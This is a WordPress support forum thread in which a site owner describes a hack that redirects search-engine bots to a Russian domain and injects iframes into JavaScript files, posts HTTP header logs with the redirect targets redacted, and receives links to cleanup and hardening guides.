WordPress.org

Ready to get started?Download WordPress

Forums

SITE HACKED: redirect to sociallytouch.ru (4 posts)

  1. senra
    Member
    Posted 1 year ago #

    Hi,

    I am facing a peculiar problem for the past one week. I am using Mantra Theme, for one of my customer's site. Last week, i found the site was hacked, and .htaccess file was modified to redirect all google bots to a russian site. eg: sociallytouch.ru ..

    I deleted all existing installation, but kept the same DB. I uploaded fresh files of wordpress and Mantra Theme, and still the site is redirected to the russian site.

    I could have just re-installed. But i wanted to find why it was happening, and thus started debugging. From Live HTTP headers, and firebug, i could observe the following.

    1. The redirect happens, the moment the custom header is accessed, a 303 redirect is happening.

    2. I tried accessing the custom header file path, and the site is redirecting. For other files, its NOT redirecting.

    3. I disabled javascript, and then accessed, and the same thing is happening.

    4. I tried searching for the term ".ru" in options table, and in Posts table, but i could find no records in the table. But still from some where, the wordpress is redirecting to sociallytouch.ru .

    Can any one guess why its happening? I searched in the net to get any help, but i could find only the below link specific to this issue.

    http://labs.sucuri.net/?details=sociallytouch.ru

    Update:
    -------

    I forgot to mention, that there is a iframe injunction in all my javascript files..

  2. Andrew
    Forum Moderator
    Posted 1 year ago #

  3. senra
    Member
    Posted 1 year ago #

    Thanks Andrew.. i had went through those links, and took preventive measures..

    Now i want to locate exactly where this hack happened..

    i am providing a copy of live http headers below..

    <br />
    <br />
    http://www.girilaljainarchive.net/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header</p><br />
    <p>GET /wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header HTTP/1.1<br />
    Host: www.girilaljainarchive.net<br />
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0<br />
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8<br />
    Accept-Language: en-US,en;q=0.5<br />
    Accept-Encoding: gzip, deflate<br />
    Connection: keep-alive<br />
    Cookie:<br />
    HTTP/1.1 200 OK<br />
    Date: Sun, 11 Nov 2012 11:40:56 GMT<br />
    Server: Apache<br />
    Vary: Accept-Encoding<br />
    Content-Encoding: gzip<br />
    Content-Length: 592<br />
    Keep-Alive: timeout=10, max=30<br />
    Connection: Keep-Alive<br />
    Content-Type: text/html; charset=UTF-8<br />
    ----------------------------------------------------------<br />
    http://www.girilaljainarchive.net/wp-admin/css/install.css?ver=3.4.2</p><br />
    <p>GET /wp-admin/css/install.css?ver=3.4.2 HTTP/1.1<br />
    Host: www.girilaljainarchive.net<br />
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0<br />
    Accept: text/css,*/*;q=0.1<br />
    Accept-Language: en-US,en;q=0.5<br />
    Accept-Encoding: gzip, deflate<br />
    Connection: keep-alive<br />
    Referer: http://www.girilaljainarchive.net/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header<br />
    Cookie: Cache-Control: max-age=0</p><br />
    <p><strong>HTTP/1.1 301 Moved Permanently</strong><br />
    Date: Sun, 11 Nov 2012 11:40:57 GMT<br />
    Server: Apache<br />
    <strong>Location: Really, don't post that</strong><br />
    Content-Length: 329<br />
    Keep-Alive: timeout=10, max=29<br />
    Connection: Keep-Alive<br />
    Content-Type: text/html; charset=iso-8859-1<br />
    ----------------------------------------------------------<br />
    http://www.girilaljainarchive.net/wp-admin/images/wordpress-logo.png?ver=20120216</p><br />
    <p>GET /wp-admin/images/wordpress-logo.png?ver=20120216 HTTP/1.1<br />
    Host: www.girilaljainarchive.net<br />
    User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:16.0) Gecko/20100101 Firefox/16.0<br />
    Accept: image/png,image/*;q=0.8,*/*;q=0.5<br />
    Accept-Language: en-US,en;q=0.5<br />
    Accept-Encoding: gzip, deflate<br />
    Connection: keep-alive<br />
    Referer: http://www.girilaljainarchive.net/wp-admin/upgrade.php?_wp_http_referer=%2Fwp-admin%2Fthemes.php%3Fpage%3Dcustom-header<br />
    Cookie:<br />
    Cache-Control: max-age=0</p><br />
    <p>HTTP/1.1 301 Moved Permanently<br />
    Date: Sun, 11 Nov 2012 11:40:57 GMT<br />
    Server: Apache<br />
    <strong>Location: Redacted</strong><br />
    Content-Length: 329<br />
    Keep-Alive: timeout=10, max=30<br />
    Connection: Keep-Alive<br />
    Content-Type: text/html; charset=iso-8859-1<br />
    ----------------------------------------------------------<br />
  4. @senra? You're hacked, you really don't need to post that here. We get it.

    I'm sorry but there are no shortcuts to getting out of this. You or someone needs to delouse that installation. It's a lot of work ahead of you.

    Re-iterating what Andrew already posted:

    You need to start working your way through these resources:
    http://codex.wordpress.org/FAQ_My_site_was_hacked
    http://wordpress.org/support/topic/268083#post-1065779
    http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/
    http://ottopress.com/2009/hacked-wordpress-backdoors/

    Additional Resources:
    http://sitecheck.sucuri.net/scanner/
    http://www.unmaskparasites.com/
    http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html
    http://codex.wordpress.org/Hardening_WordPress
    http://www.studiopress.com/tips/wordpress-site-security.htm

Topic Closed

This topic has been closed to new replies.

About this Topic